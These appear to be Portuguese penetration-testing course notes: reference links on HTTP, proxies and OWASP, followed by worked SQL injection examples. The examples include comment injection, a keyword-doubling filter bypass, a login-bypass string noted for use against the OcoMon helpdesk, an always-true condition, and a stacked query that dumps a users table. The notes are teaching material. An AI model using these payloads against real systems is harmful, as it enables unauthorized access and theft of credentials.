Académique Documents
Professionnel Documents
Culture Documents
DNS
http://registro.br/suporte/faq/faq5.html
Mtodos HTTP
http://www.vivaolinux.com.br/artigo/Um-pouco-do-protocolo-HTTP?pagina=4
Curso Teste de Invaso em Redes e Sistemas EAD Clavis
https://www.clavis.com.br/treinamento-ensino-a-distancia-ead/teste-de-invasao-em-redes-esistemas/index.php
AJAX
http://codigofonte.uol.com.br/artigos/o-que-e-o-ajax-e-como-ele-funciona
http://www.metropoledigital.ufrn.br/aulas_avancado/web/disciplinas/desenv_web/aula_20.html
Certificados Digitais
http://www.receita.fazenda.gov.br/Novidades/Informa/DestaqueCertificadoDigital.htm
Ginga
http://www.ginga.org.br/pt-br
Proxy
http://www.tecmundo.com.br/navegador/972-o-que-e-proxy-.htm
tamperdata
http://tamperdata.mozdev.org/
Firebug
http://getfirebug.com/
OWASP Top 10 - 2013
https://www.owasp.org/index.php/Top_10_2013-Top_10
Nome:D'Avila
Back End
select id from users where
nome = 'D'Avila";
Status: Buscaria por D, porm daria erro porque esperava um ; e veio um A
Nome:D';--Avila
Back End
select id from users where
nome = 'D';--Avila";
No daria erro: caractere ; termina a linha e -- insere um comentrio
Para bypassar casos de truncamento de strings:
seleselectct id from ...
Comando para ser utilizado no OcoMon
admin' or ' -Identificando Session IDs durante autorizao
GET no portal = mj0qgdngj4ithnvonsrgaekn00
Post de auth = mj0qgdngj4ithnvonsrgaekn00
Depois da auth = mj0qgdngj4ithnvonsrgaekn00
Exemplo de Querys de SQL
select id from usuarios where
nome = '$nome'
and
senha = '$senha';
Nome: Rafael
Senha: abc123
select id from usuarios where
nome = 'Rafael'
and
senha = 'abc123';
Criando uma busca para gerar uma verdade absoluta
select id from usuarios where
nome = 'Rafael'
and
senha = ''or '1=1';
Tentativa de insero de comandos
Nome: Rafael
Senha: ' ; select * from usuarios where '1=1
select id from usuarios where
nome = 'Rafael'
and
senha = ' ' ; select * from usuarios where '1=1';
id
nome
senha
Rafael
qwerty
----